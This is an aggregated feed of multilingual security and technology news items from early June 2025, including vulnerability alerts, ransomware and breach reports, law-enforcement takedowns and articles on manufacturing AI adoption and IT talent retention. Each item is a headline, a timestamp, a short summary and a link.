이번 보고서는 제 10차 연례보고서로 2025년 3월, 주요 17개 제조국의 1,500개 이상의 제조 업체를 대상으로 실시한 글로벌 조사를 기반으로 ▲인공지능(AI), 머신러닝(ML), 클라우드 기반 시스템 등 첨단 기술의 도입과 활용 ▲사이버보안 ▲인재 전략 등 현재 제조업이 직면한 핵심 이슈들을 다뤘다. 로크웰 오토메이션은 특히 급변하는 경제 환경 속에서 제조업체들이 불확실성에 대응하고자 스마트 제조 기술을 활용해 위험을 관리하고, 운영 성과를 개선하며, 인재를 효과적으로 지원하는 방식을 중점적으로 분석했다고 설명했다. 올해 보고서에 따르면, 제조업계는 스마트 제조 기술로의 전환 속도를 더욱 높이고 있다. 전체 응답 제조 업체의 81%는 외부 및 내부 압력으로 인해 디지털 트렌스포메이션이 가속화되고 있다고 응답했으며, 스마트 제조 기술 투자의 주요 분야로는 클라우드/SaaS, AI, 사이버 보안, 품질 관리를 꼽았다.  특히 인공지능 기술에 대한 관심이 두드러졌다. 전체 제조기업의 95%가 AI 또는 ML에 투자했거나 향후 5년 내에 투자 계획을 갖고 있다고 응답했다. 생성형 AI와 인과관계 AI에 투자하는 조직은 전년 대비 12% 증가했는데, 이는 AI 도입이 이제 실험 단계를 넘어 비즈니스 성과를 높이기 위한 전략적 선택으로 자리잡고 있는 것을 시사했다.   AI 활용의 주요 목적은 품질 향상으로, 응답자의 절반(50%)이 제품 품질 관리를 위해 AI/ML 도입할 계획이라고 밝혔다. 품질 관리는 지난해에 이어 2년 연속으로 AI의 대표적인 활용 사례로 꼽혔다. 이와 함께 사이버보안은 AI 활용 계획 분야 중 두 번째로 높은 응답률(49%)을 기록했다. 이는 2024년 40%에서 증가한 수치로, 제조 환경에서 보안 리스크에 대한 경각심이 한층 높아졌음을 보여준다고 로크웰 오토메이션은 설명했다.   로크웰 오토메이션에 따르면 AI 기술은 인력 문제 해결에서도 중요한 역할을 하고 있다. 전체 응답 기업의 48%는 스마트 제조 기술 투자를 통해 기존 인력을 재배치하거나 신규 채용할 계획이라고 밝혔으며, 41%는 AI 및 자동화를 통해 기술 격차 해소 및 인력난 대응에 나설 계획이라고 답했다.   이 외에도 보고서는 제조업체들이 스마트 기술을 기반으로 보다 효율적이고 유연한 운영 체계를 구축하고 있다고 설명했다. 제조업체들은 공급망 강화를 비롯해 지속 가능성 이니셔티브 확대, 데이터 기반의 신속한 의사결정 등 다양한 부문에서 전환을 가속화하고 있다. AI 기술에 대한 수요가 높아지는 가운데 많은 제조업체들이 도입 과정에서 여러 과제에 직면하고 있는 것으로 확인됐다. 응답자의 절반 가까이가 AI 구현 역량을 ‘매우 중요한 기술’로 인식하고 있다는 점에서 그렇다. 이는 작년의 10%에서 크게 증가한 수치다.   로크웰 오토메이션의 회장 이자 CEO인 블레이크 모렛은 “오늘날의 기술 발전은 사람과 기술의 잠재력을 결합해 우리 모두의 미래를 새롭게 설계할 기회를 제공하고 전 세계 제조업체들이 스마트 제조 기술을 통해 혼란 속에서도 속도와 민첩성을 확보하며 새로운 비즈니스 기회를 창출하고 있음을 의미한다”라며, “로크웰 오토메이션은 혁신과 복원력이 밀접하게 연결되어 있고, 급변하는 환경 속에서도 올바른 기술과 인력을 통해 복잡성을 단순화하고 업계를 선도할 수 있도록 지원하고 있다”고 말했다. dl-ciokorea@foundryco.com

https://www.cio.com/article/4002094/%ec%a0%9c%ec%a1%b0-%ec%97%85%ea%b3%84-%ec%8a%a4%eb%a7%88%ed%8a%b8-%ea%b8%b0%ec%88%a0-%ec%a0%84%ed%99%98-%ea%b0%80%ec%86%8d%c2%b7%c2%b7%c2%b7-95%ea%b0%80-ai-%ed%88%ac%ec%9e%90-%ec%98%88%ec%a0%95.html
Vulnérabilité dans Roundcube (05 juin 2025)
2025-06-05T00:00:00Z | 1749081600

Le 01 juin 2025, Roundcube a publié des correctifs concernant une vulnérabilité critique affectant son portail de messagerie ainsi que tous les produits l'incluant (par exemple cPanel et Plesk). Cette vulnérabilité permet à un utilisateur authentifié d'exécuter du code arbitraire à distance....

https://www.cert.ssi.gouv.fr/alerte/CERTFR-2025-ALE-008/
Multiples vulnérabilités dans les produits Cisco (05 juin 2025)
2025-06-05T00:00:00Z | 1749081600

De multiples vulnérabilités ont été découvertes dans les produits Cisco. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0479/
Vulnérabilité dans Wireshark (05 juin 2025)
2025-06-05T00:00:00Z | 1749081600

Une vulnérabilité a été découverte dans Wireshark. Elle permet à un attaquant de provoquer un déni de service à distance.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0478/
Multiples vulnérabilités dans les produits VMware (05 juin 2025)
2025-06-05T00:00:00Z | 1749081600

De multiples vulnérabilités ont été découvertes dans VMware NSX. Elles permettent à un attaquant de provoquer une injection de code indirecte à distance (XSS).

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0477/
CNCS é parceiro do Concurso Media@ção 2025
2025-06-05T00:00:00Z | 1749081600

A iniciativa, promovida pela Rede de Bibliotecas Escolares (RBE) e pela Estrutura de Missão para a Comunicação Social (#PortugalMediaLab), em parceria com o Centro Nacional de Cibersegurança (CNCS), a Direção-Geral da Educação (DGE), a Comissão Nacional da Unesco (CNU), o Plano Nacional de Cinema (PNC), o Plano Nacional de Leitura 2027 (PNL2027) e a Associação DNS.PT (.PT) distinguiu os melhores trabalhos de 2025, já disponíveis online. Esta edição do concurso enquadrou-se no Ano Europeu da Educação para a Cidadania Digital, 2025, promovido pelo Conselho da Europa, e teve como tema: Inteligência artificial e media. O concurso foi aberto a todos os alunos do ensino básico e secundário, oferecendo a oportunidade de expressarem as suas ideias através de vídeos, podcasts ou animações 2D ou 3D. Na categoria 1.º/ 2.º ciclos do ensino básico, o júri decidiu não atribuir Prémios ou Menções Honrosas. Na Categoria 3.º ciclo/ ensino secundário: 1.º Prémio foi atribuído à Escola Secundária du Bocage, Setúbal, pelo vídeo “Sorri! AI para todos”. 2.º Prémio foi atribuído à Escola Básica 2,3 de Nogueira, Agrupamento de Escolas Alberto Sampaio, Braga, pelo vídeo “Contra mão”. Foram ainda entregue Menções Honrosas à Escola Básica de Argoncilhe, Agrupamento de Escolas de Argoncilhe, pelo vídeo “Eco digital”; à Escola Secundária de Santo André, Agrupamento de Escolas de Santo André, Barreiro, pela animação “IA, inimiga ou amiga?”; à Escola Básica e Secundária Professor Armando de Lucena, Agrupamento de Escolas Professor Armando de Lucena, Malveira, Mafra, pelo vídeo “Sombras” e à Escola Básica 2,3 André Soares, Agrupamento de Escolas André Soares, Braga, pela animação “Um santo Os trabalhos distinguidos podem ser vistos no canal Youtube do concurso.

https://dyn.cncs.gov.pt/pt/detalhe/art/135934/cncs-e-parceiro-do-concurso-mediacao-2025
Securing the Electric Grid with DNP3 and Unidirectional Data Flow
2025-06-05T00:00:00Z | 1749081600

While DNP3 helps ensure reliable and interoperable communication between devices, it also presents new cybersecurity challenges.

https://www.opswat.com/blog/securing-the-electric-grid-with-dnp3-and-unidirectional-data-flow
Helping the Cybersecurity Community in Light of Russian Cyber Attacks by Hitesh Sheth
2025-06-05T00:00:00Z | 1749081600

Over the last week, we have seen Russia use a combination of tactics in warfare that has not been seen before. From the use of cellular telephone networks for distribution of information that was designed to incite panic among the general population to manipulation of enterprise networks and computers to disrupt critical government departments and private industry. Vladimir Putin has proven that there are no boundaries that he is unwilling to cross when it comes to promoting his self-serving view of the world.

https://www.vectra.ai/blog/helping-the-cybersecurity-community-in-light-of-russian-cyber-attacks
Play ransomware crims exploit SimpleHelp flaw in double-extortion schemes
2025-06-04T23:40:05Z | 1749080405

Recompiled binaries and phone threats used to boost the pressure Groups linked with the Play ransomware have exploited more than 900 organizations, the FBI said Wednesday, and have developed a number of new techniques in their double-extortion campaigns - including exploiting a security flaw in remote-access tool SimpleHelp if orgs haven't patched it.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/play_ransomware_infects_900_victims/
Daily Dose of Dark Web Informer - 4th of June 2025
2025-06-04T23:39:10Z | 1749080350

This daily article is intended to make it easier for those who want to stay updated with my regular Dark Web Informer and X/Twitter posts.

https://darkwebinformer.com/daily-dose-of-dark-web-informer-4th-of-june-2025/
Threat Attack Daily - 4th of June 2025
2025-06-04T23:21:59Z | 1749079319

Threat Attack Daily - 4th of June 2025

https://darkwebinformer.com/threat-attack-daily-4th-of-june-2025/
Ransomware Attack Update for the 4th of June 2025
2025-06-04T23:15:53Z | 1749078953

Ransomware Attack Update for the 4th of June 2025

https://darkwebinformer.com/ransomware-attack-update-for-the-4th-of-june-2025/
Feds Seize BidenCash Carding Market and Its Crypto Profits
2025-06-04T22:42:46Z | 1749076966

After three years of peddling stolen data, BidenCash, one of the web's most brazen cybercrime hubs is offline, and authorities say they're just getting started.

https://hackread.com/feds-seize-bidencash-carding-market-crypto-profits/
Cómo evitar la fuga de cerebros en TI
2025-06-04T22:30:18Z | 1749076218

Cuando se trata de diseñar la estrategia empresarial, el departamento de TI tiene cada vez mayor protagonismo. Quizás hace unos años se movía al margen de la junta directiva, como un mero proveedor sin mayor impacto en el negocio. Pero en un contexto como el actual, con la tecnología aportando valor añadido a las organizaciones, habilitando nuevos filones por explotar, estas barreras se han difuminado.   Sin embargo, esto no siempre se traduce en un alineamiento perfecto entre TI y negocio. El estudio IT Leaders Pulse 2022, realizado a través de entrevistas a un millar de líderes tecnológicos, cifraba en un 98% quienes consideraban que los procesos de trabajo entre sus departamentos y los equipos de negocio podían mejorarse. En los tres años que han pasado desde que saliese el estudio se han dado distintos factores que podrían impactar en sus conclusiones. Por un lado, se ha mitigado el fenómeno de la gran renuncia, que por aquel entonces estaba en pleno impacto y, como tal, permeaba el informe. Algunas enseñanzas han quedado, como la necesidad de trabajar en las condiciones adecuadas para retener el talento, pero el escenario es distinto.   Además, la explosión de la IA generativa y, en concreto, de su modalidad agentiva, ha supuesto un nuevo impulso al papel del departamento tecnológico, con nuevas herramientas que pueden impulsar el negocio. De acuerdo al informe Empleabilidad y talento digital 2024 de la Fundación VASS, un 51% de organizaciones creen que la IA generativa influirá de manera importante en las compañías, previendo una mejora en la eficiencia de más del 10%, mientras que casi el 38% cree que habrá un impacto moderado. “Ello implica considerar que esta tecnología es clave y estratégica para sus sectores; de tal manera que su no adopción puede suponer un riesgo para la supervivencia de la empresa”, destacan. También se referían a esto desde BSG con “alinear las iniciativas de datos con objetivos de negocio”, dentro de las prioridades que identificaban para el Foro Económico Mundial (World Economic Forum) para 2024. La ‘genIA’ obliga a las organizaciones a mejorar el control sobre los datos para aprovechar sus beneficios, y “parte de esto será educar a la junta directiva en lo que significa realmente ser una compañía orientada a datos”, explicaban. “Seguiremos viendo a negocio y TI acercarse” para así alcanzar el éxito.   La explosión de la IA generativa y agentiva ha supuesto un nuevo impulso al papel del departamento tecnológico “El departamento de TI ha pasado de ser un área de soporte a convertirse en un elemento clave en la definición e implementación de la estrategia empresarial”, desarrolla la vicerrectora de Transformación Digital de la UPV (Universidad Politécnica de Valencia) y antigua directora de la ETSI Informática, Silvia Terrasa, quien señala que en algunos sectores como finanzas o sanidad, donde la digitalización es crítica, el área tecnológica ya se ha integrado en el núcleo estratégico. “No obstante, hay camino que recorrer aún en otro tipo de organizaciones donde todavía persiste una visión instrumental de la tecnología, lo que impide que se perciba la capacidad que tiene el departamento de TI para otorgar valor y permitir una transformación real”, matiza.  Relación con la junta directiva  En este alineamiento entre los objetivos de negocio y el área de TI tiene un papel esencial la persona al mando de este último departamento. Como el del equipo que lidera, el rol de CIO ha evolucionado de forma consistente al creciente desarrollo tecnológico, ganando peso en la junta directiva. Si en el informe State of the CIO 2023 era un 49% de líderes de TI los que decían reportar directamente a su CEO, dos años más tarde el porcentaje ha crecido hasta el 58%. Como explicaba en 2023 la analista de Gartner Mandi Bishop, en esta posición se está experimentando “un cambio de paradigma, compartiendo responsabilidades de liderazgo con sus pares CxO para atraer el éxito digital”. “Para liderar exitosamente las iniciativas de transformación digital, los CIO deben compartir esfuerzos con líderes de negocio para situar el diseño, la entrega y la gestión de las capacidades digitales con los equipos más cerca de donde se crea el valor”.   Aunque la teoría esté clara, llevarla a la práctica a veces conlleva ciertas dificultades. “Es frecuente encontrar desajustes”, señala Terrasa. “Hay que tener en cuenta que los equipos directivos y los departamentos de TI suelen hablar lenguajes distintos”, lo que puede llevar a no entender las complejidades técnicas o no contar con la visión de negocio necesaria para priorizar. También se dan distintas prioridades y calendarios de actuación. “Introducir perfiles intermedios que sean capaces de establecer un diálogo entre los dos actores es fundamental para el buen funcionamiento”, valora. En el citado estudio IT Leaders Pulse 2022 se apuntaba precisamente a la creación de equipos multidisciplinares como una vía para sortear estas diferencias, con personas de la parte de tecnología y otras de negocio, entendiendo que “tanto las personas como los procesos dependen fuertemente de la tecnología para alcanzar los objetivos de negocio”.   Terrasa refiere la necesidad de una gobernanza tecnológica clara como uno de los grandes retos para alinear objetivos. “Otra de las dificultades es que se suele infravalorar lo que ‘cuesta’ el incorporar la tecnología en los procesos productivos, por lo que se suele dotar de una financiación insuficiente para hacerles frente”. Esto tiene una segunda derivada, añade: los profesionales TI cada vez están más demandados. “No se generan la cantidad necesaria de profesionales TI, lo cual provoca una falta de talento y una rotación excesiva que hace que no exista una estabilidad en los equipos”. En España, la rotación en tecnología se sitúa entre el 15-20% anual, por encima del 12-15% de la media europea; perfiles como los de desarrolladores full-stack junior cambian de empresa de media cada un año y medio y dos años.  Evitar la fuga de talento El entorno tecnológico sufre de una permanente falta de talento. Una encuesta de IDC de 2024 estimaba en más del 90% las organizaciones de todo el mundo que se verán afectadas en 2026 por la brecha de profesionales con habilidades TI. Según la Fundación VASS, la falta de talento digital en España supone una menor actividad que, traducida a términos económicos, se situaría en los 1.180 millones de euros. Estos datos hacen tanto más acuciante la necesidad de que la estrategia de negocio y la parte de TI vayan de la mano, de tal modo que no tenga efectos negativos en el equipo.   “Es importante integrar la innovación como eje estratégico, no solo como herramienta de soporte” Silvia Terrasa Para evitar que ocurra, Terrasa avanza la necesidad de incorporar en la planificación empresarial aspectos digitales “desde el inicio, no solo en la ejecución”. “A nivel de la definición de las líneas estratégicas, puede ser interesante establecer KPI compartidos entre negocio y TI para alinear objetivos y medir avances conjuntos. Y obviamente es fundamental darle visibilidad y reconocimiento del área TI como generadora de valor, no solo como un coste”, perfila.  Mediante esa sintonía entre negocio y tecnología se pueden tomar medidas para evitar la fuga de talento tecnológico, señala. “La estrategia debería empezar entendiendo que el talento TI no solo busca salario, sino propósito, crecimiento, autonomía y retos tecnológicos interesantes, y por tanto crear trayectorias profesionales técnicas atractivas”. En esta misma línea, desde Michael Page apuntan tres demandas principales de profesionales del sector: piden una remuneración competitiva, flexibilidad y conciliación laborar y oportunidades de desarrollo profesional.    “Además, es importante integrar la innovación como eje estratégico, no solo como herramienta de soporte”, continúa Terrasa, “ofreciendo al personal técnico oportunidades reales de participar en proyectos transformadores. Si esto se desarrolla convenientemente, se deberían evitar la desconexión entre tecnología y negocio, haciendo que los profesionales TI se sientan parte del propósito global, no como un servicio aislado, mejorando su integración y su fidelidad”.

https://www.cio.com/article/4002055/como-evitar-la-fuga-de-cerebros-en-ti.html
Feds seize 145 domains associated with BidenCash cybercrime platform
2025-06-04T22:26:54Z | 1749076014

The cybercrime marketplace was used by more than 117,000 customers and trafficked more than 15 million credit card numbers since March 2022, the Justice Department said. The post Feds seize 145 domains associated with BidenCash cybercrime platform appeared first on CyberScoop.

https://cyberscoop.com/bidencash-marketplace-domains-seized/
Feds seize 145 domains associated with BidenCash cybercrime platform
2025-06-04T22:26:54Z | 1749076014

The cybercrime marketplace was used by more than 117,000 customers and trafficked more than 15 million credit card numbers since March 2022, the Justice Department said. The post Feds seize 145 domains associated with BidenCash cybercrime platform appeared first on CyberScoop.

https://cyberscoop.com/bidencash-marketplace-domains-seized/
ICE Quietly Scales Back Rules for Courthouse Raids
2025-06-04T22:24:17Z | 1749075857

A requirement that ICE agents ensure courthouse arrests don’t clash with state and local laws has been rescinded by the agency. ICE declined to explain what that means for future enforcement.

https://www.wired.com/story/ice-quietly-scales-back-rules-for-courthouse-raids/
35K Solar Devices Vulnerable to Potential Hijacking
2025-06-04T21:53:20Z | 1749074000

A little more than three-quarters of these exposed devices are located in Europe, followed by Asia, with 17%.

https://www.darkreading.com/vulnerabilities-threats/35k-solar-devices-internet-exposure-hijacking
Ukraine strikes Russian bomber-maker with hack attack
2025-06-04T20:53:58Z | 1749070438

Drones are not enough Following a daring drone attack on Russian airfields, Ukrainian military intelligence has reportedly also hacked the servers of Tupolev, the Kremlin's strategic bomber maker.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/ukraine_hack_attack_russia/
Vibe coding is here to stay. Can it ever be secure?
2025-06-04T20:52:49Z | 1749070369

Research shows that AI-generated code is remarkably insecure. Yet experts tell CyberScoop it's up to industry to figure out a way to limit the issues the technology introduces.   The post Vibe coding is here to stay. Can it ever be secure?  appeared first on CyberScoop.

https://cyberscoop.com/vibe-coding-ai-cybersecurity-llm/
Vibe coding is here to stay. Can it ever be secure?
2025-06-04T20:52:49Z | 1749070369

Research shows that AI-generated code is remarkably insecure. Yet experts tell CyberScoop it's up to industry to figure out a way to limit the issues the technology introduces.   The post Vibe coding is here to stay. Can it ever be secure?  appeared first on CyberScoop.

https://cyberscoop.com/vibe-coding-ai-cybersecurity-llm/
Emerging Tech: Adoption Trends in Preemptive Cyber Defense
2025-06-04T20:51:23Z | 1749070283

According to Gartner®, current projections indicate a substantial increase in the adoption rate of Preemptive Cyber Defense (PDC) solutions from 5% to 35% by 2028. Generative AI is transforming cybersecurity, making traditional “detect and respond” methods insufficient in blocking modern-day attacks. Malicious actors are using AI to scale and personalize attacks, requiring preemptive threat intelligence […] The post Emerging Tech: Adoption Trends in Preemptive Cyber Defense appeared first on Silent Push.

https://www.silentpush.com/white-papers-and-reports/emerging-tech-adoption-trends-in-preemptive-cyber-defense/
Announcing Graylog 6.2.3
2025-06-04T20:50:08Z | 1749070208

Announcing Graylog 6.2.3 This is a bug-fix release that improves Graylog’s functionality. Please read on for information on what has changed. Download Links Release date: 2025-06-04 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog […] The post Announcing Graylog 6.2.3 appeared first on Graylog.

https://graylog.org/post/announcing-graylog-6-2-3/
‘I do not have confidence’ that US infrastructure is cyber-secure, former NSC official says
2025-06-04T20:49:00Z | 1749070140

At the AI Expo for National Competitiveness, Anne Neuberger told audiences that artificial intelligence tools are an enhancement opportunity for U.S. cyber defenses and intelligence collection.

https://www.nextgov.com/cybersecurity/2025/06/i-do-not-have-confidence-us-infrastructure-cyber-secure-former-nsc-official-says/405816/
Announcing Graylog 6.1.12
2025-06-04T20:46:56Z | 1749070016

Announcing Graylog 6.1.12 This is a bug-fix release that improves Graylog’s functionality. Please read on for information on what has changed. Download Links Release date: 2025-06-04 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog […] The post Announcing Graylog 6.1.12 appeared first on Graylog.

https://graylog.org/post/announcing-graylog-6-1-12/
Microsoft unveils free EU cybersecurity program for governments
2025-06-04T20:36:27Z | 1749069387

Microsoft announced in Berlin today a new European Security Program that promises to bolster cybersecurity for European governments.

https://www.bleepingcomputer.com/news/microsoft/microsoft-unveils-free-eu-cybersecurity-program-for-governments/
FBI: Play ransomware breached 900 victims, including critical orgs
2025-06-04T20:06:14Z | 1749067574

In an update to a joint advisory with CISA and the Australian Cyber Security Centre, the FBI said that the Play ransomware gang had breached roughly 900 organizations as of May 2025, three times the number of victims reported in October 2023.

https://www.bleepingcomputer.com/news/security/fbi-play-ransomware-breached-900-victims-including-critical-orgs/
Ukraine’s military intelligence agency stole 4.4GB of highly classified internal data from Tupolev
2025-06-04T20:03:53Z | 1749067433

Ukraine’s GUR hacked the Russian aerospace and defense company Tupolev, stealing 4.4GB of highly classified internal data. Ukraine’s military intelligence agency GUR (aka HUR) claims the hack of the Russian aerospace and defense company Tupolev. According to Kyiv Post, Ukraine’s Military Intelligence compromised the United Aircraft Company (UAC) Tupolev division, which is a key developer […]

https://securityaffairs.com/178641/hacking/ukraines-military-intelligence-agency-stole-4-4gb-of-highly-classified-internal-data-from-tupolev.html
Cisco security advisory (AV25-318)
2025-06-04T19:51:43Z | 1749066703

https://cyber.gc.ca/en/alerts-advisories/cisco-security-advisory-av25-318
Ransomware scum leak patient data after disrupting chemo treatments at Kettering
2025-06-04T19:42:09Z | 1749066129

Literally adding insult to injury Kettering Health patients who had chemotherapy sessions and pre-surgery appointments canceled due to a ransomware attack in May now have to deal with the painful prospect that their personal info may have been leaked online.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/ransomware_scum_leak_kettering_patient_data/
Lessons from Expert Roundtables on Designing an Effective Early Wealth Building Policy–And Avoiding Costly Pitfalls
2025-06-04T19:38:34Z | 1749065914

This brief outlines the major takeaways from eight expert roundtables on early wealth building policy, hosted by the Aspen Institute Financial Security Program (Aspen FSP) over two weeks in May 2025 under Chatham House Rule. The roundtables featured over 50 experts (not including Aspen FSP staff) from many sectors and fields, including banking, investing, philanthropy, […] The post Lessons from Expert Roundtables on Designing an Effective Early Wealth Building Policy–And Avoiding Costly Pitfalls appeared first on The Aspen Institute.

https://www.aspeninstitute.org/publications/early-wealth-building-roundtables/
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
2025-06-04T19:38:13Z | 1749065893

The Ukrainian police arrested a 35-year-old hacker who breached 5,000 accounts at an international hosting company and used them to mine cryptocurrency, resulting in $4.5 million in damages.

https://www.bleepingcomputer.com/news/security/hacker-arrested-for-breaching-5-000-hosting-accounts-to-mine-crypto/
Vishing Crew Targets Salesforce Data
2025-06-04T19:29:15Z | 1749065355

A group that Google is tracking as UNC6040 has been tricking users at many organizations into installing a malicious version of a Salesforce app to gain access and steal data from the platform.

https://www.darkreading.com/application-security/vishing-crew-targets-salesforce-data
BidenCash darknet forum taken down by US, Dutch law enforcement
2025-06-04T19:20:31Z | 1749064831

The FBI and Dutch national police were among the law enforcement agencies that took down 145 domains linked to BidenCash, a cybercrime marketplace linked to millions of dollars in fraud since late 2022.

https://therecord.media/bidencash-cybercrime-darknet-market-takedown-us-netherlands
Ransomware gang claims responsibility for Kettering Health hack
2025-06-04T19:07:13Z | 1749064033

A group of cybercriminals known as Interlock is advertising stolen data from Kettering Health, which includes patients’ data.

https://techcrunch.com/2025/06/04/ransomware-gang-claims-responsibility-for-kettering-health-hack/
#StopRansomware: Play Ransomware
2025-06-04T19:00:00Z | 1749063600

#StopRansomware: Play Ransomware

https://www.ic3.gov/CSA/2025/250604.pdf
Salesforce customers duped by series of social-engineering attacks
2025-06-04T18:40:57Z | 1749062457

Google Threat Intelligence Group said about 20 organizations have been hit by a cybercrime group it tracks as UNC6040. The post Salesforce customers duped by series of social-engineering attacks appeared first on CyberScoop.

https://cyberscoop.com/google-unc6040-salesforce-attacks/
Salesforce customers duped by series of social-engineering attacks
2025-06-04T18:40:57Z | 1749062457

Google Threat Intelligence Group said about 20 organizations have been hit by a cybercrime group it tracks as UNC6040. The post Salesforce customers duped by series of social-engineering attacks appeared first on CyberScoop.

https://cyberscoop.com/google-unc6040-salesforce-attacks/
Alleged Sale of an Exploit to Bypass Amazon WAF
2025-06-04T18:40:32Z | 1749062432

Alleged Sale of an Exploit to Bypass Amazon WAF

https://darkwebinformer.com/alleged-sale-of-an-exploit-to-bypass-amazon-waf/
Exclusive: Hackers Leak 86 Million AT&T Records with Decrypted SSNs
2025-06-04T18:31:37Z | 1749061897

Hackers leak data of 88 million AT&T customers with decrypted SSNs; latest breach raises questions about links to earlier Snowflake-related attack.

https://hackread.com/hackers-leak-86m-att-records-with-decrypted-ssns/
Commerce rebrands its AI Safety Institute
2025-06-04T18:26:00Z | 1749061560

The transformation of the Biden-era U.S. AI Safety Institute further signals the Trump administration’s innovation-prioritizing approach to AI governance.

https://www.nextgov.com/artificial-intelligence/2025/06/commerce-rebrands-its-ai-safety-institute/405803/
Alleged sale of Cisco ISE Pre-auth Remote Code Execution (0day) Exploit
2025-06-04T18:09:42Z | 1749060582

Alleged sale of Cisco ISE Pre-auth Remote Code Execution (0day) Exploit

https://darkwebinformer.com/alleged-sale-of-cisco-ise-pre-auth-remote-code-execution-0day-exploit/
How Neuroscience Can Help Us Battle 'Alert Fatigue'
2025-06-04T18:00:00Z | 1749060000

By understanding the neurological realities of human attention, organizations can build more sustainable security operations that protect not only their digital assets but also the well-being of those who defend them.

https://www.darkreading.com/vulnerabilities-threats/how-neuroscience-battle-alert-fatigue
Out of Office for Summer? Cybercriminals Are Just Getting Started
2025-06-04T18:00:00Z | 1749060000

It’s vital that business leaders keep teams engaged, vigilant and turn people into organizations’ first line of defense this summer.

https://www.securitymagazine.com/blogs/14-security-blog/post/101669-out-of-office-for-summer-cybercriminals-are-just-getting-started
How to not burn out your developers: Optimize the developer experience
2025-06-04T17:30:56Z | 1749058256

Software is the engine of innovation, but even the most brilliant ideas can falter without a smooth, efficient development process. That's where developer experience takes center stage. Developer experience is more than just happy developers; it's about empowering them to build extraordinary things. It's about removing roadblocks, fostering collaboration, and providing the tools and environment they need to thrive. Why the developer experience matters more than ever Think of your developers as elite athletes. To perform at their peak, they need the right training, equipment, and support system. A poor developer experience is like forcing them to run a marathon in flip-flops – frustrating, inefficient, and ultimately detrimental to their performance. A superior developer experience , on the other hand, unleashes their full potential. This translates to Faster time to market: Streamlined workflows, automated processes, and collaborative tools accelerate development cycles, enabling you to deliver innovative solutions ahead of the competition. Elevated code quality: Happy, empowered developers write better code. With the right tools and support, they can focus on crafting elegant, robust solutions that delight users and drive business value. Increased developer retention: Top talent is a precious commodity. A positive developer experience  fosters a sense of purpose and satisfaction, making your organization a magnet for the best developers and reducing costly turnover. OpenText: Your partner in developer experience excellence OpenText offers a comprehensive suite of developer experience solutions designed to elevate your developer experience and fuel your software development success. 1. OpenText™ DevOps Cloud: Empower developers in the cloud This cloud-based AI DevOps platform provides a unified environment for development, testing, and deployment, eliminating the friction of juggling disparate tools. Integrated toolchain: Connect all phases of your software delivery lifecycle (SDLC) and consolidate your tools into a single, holistic platform. AI-powered automation: Free your developers from tedious tasks with AI-driven test automation and intelligent assistance. Seamless collaboration: Foster a culture of shared success with integrated tools that break down silos between development, testing, and operations teams. Performance optimization: Equip your developers with performance engineering tools to proactively identify and address bottlenecks, ensuring your applications perform flawlessly under pressure. 2. OpenText™ Functional Testing: Shift-left with confidence Integrate automated testing early in the development cycle and empower developers to catch bugs sooner, reducing costly rework and accelerating delivery. AI-driven testing: Simplify test creation and maintenance with AI-powered tools that learn and adapt to your application. Codeless automation: Make test automation accessible to all developers, regardless of their testing expertise. 3. OpenText™ Performance Engineering: Build for scale and performance Ensure your applications can handle the demands of real-world usage with comprehensive performance testing and analysis tools. Real-world simulation: Simulate user traffic and load conditions to identify performance bottlenecks before they impact your users. Continuous performance feedback: Integrate performance testing into your CI/CD pipeline for continuous feedback and optimization. 4. OpenText™ Software Delivery Management: Orchestrate your development lifecycle Manage your entire software development lifecycle from a single platform, streamlining workflows and fostering collaboration. Agile and DevOps support: Embrace Agile and DevOps methodologies with tools that support iterative development and continuous delivery. End-to-end visibility: Gain complete transparency into your development process, enabling data-driven decisions and continuous improvement. Embrace the future of developer experience with OpenText The future of software development belongs to those who prioritize developer experience. OpenText is your partner in building a developer-centric culture that fosters innovation, accelerates delivery, and drives business success. Ready to unleash the full potential of your development team? Explore OpenText DevOps solutions or contact an OpenText expert today! The post How to not burn out your developers: Optimize the developer experience  appeared first on OpenText Blogs.

https://blogs.opentext.com/how-to-not-burn-out-your-developers-optimize-the-developer-experience/
Researchers Bypass Deepfake Detection With Replay Attacks
2025-06-04T17:30:13Z | 1749058213

An international group of researchers found that simply rerecording deepfake audio with natural acoustics in the background allows it to bypass detection models at a higher-than-expected rate.

https://www.darkreading.com/cybersecurity-analytics/researchers-bypass-deepfake-detection-replay-attacks
Microsoft Edge security advisory (AV25-317)
2025-06-04T17:23:43Z | 1749057823

https://cyber.gc.ca/en/alerts-advisories/microsoft-edge-security-advisory-av25-317
Republican legislators voice support for public funding in AI research
2025-06-04T17:19:00Z | 1749057540

The senators advocated for continued federal investment in artificial intelligence research and development, along with nimble regulation and industry collaboration.

https://www.nextgov.com/artificial-intelligence/2025/06/republican-legislators-voice-support-public-funding-ai-research/405797/
Salesforce’s AI agents receive FedRAMP high authorization
2025-06-04T17:16:00Z | 1749057360

Salesforce said that its Agentforce platform “has built-in trust standards and a unified approach.”

https://www.nextgov.com/artificial-intelligence/2025/06/salesforces-ai-agent-receives-fedramp-high-authorization/405798/
Red Canary CFP tracker: June 2025
2025-06-04T17:12:37Z | 1749057157

Red Canary's monthly roundup of upcoming security conferences and calls for papers (CFP) submission deadlines

https://redcanary.com/blog/news-events/cfp-tracker-june-2025/
Upcoming EOP Events Newsletter — June 2025
2025-06-04T17:00:39Z | 1749056439

Improving job quality doesn’t just benefit workers; it can also strengthen small businesses themselves and the broader communities they serve. Yet, many small business owners lack the resources and knowledge needed to improve the quality of their jobs. The post Upcoming EOP Events Newsletter — June 2025 appeared first on The Aspen Institute.

https://www.aspeninstitute.org/blog-posts/upcoming-eop-events-newsletter-june-2025/
CrowdStrike’s former CTO on cyber rivalries and how automation can undermine security for early-stage startups
2025-06-04T16:47:09Z | 1749055629

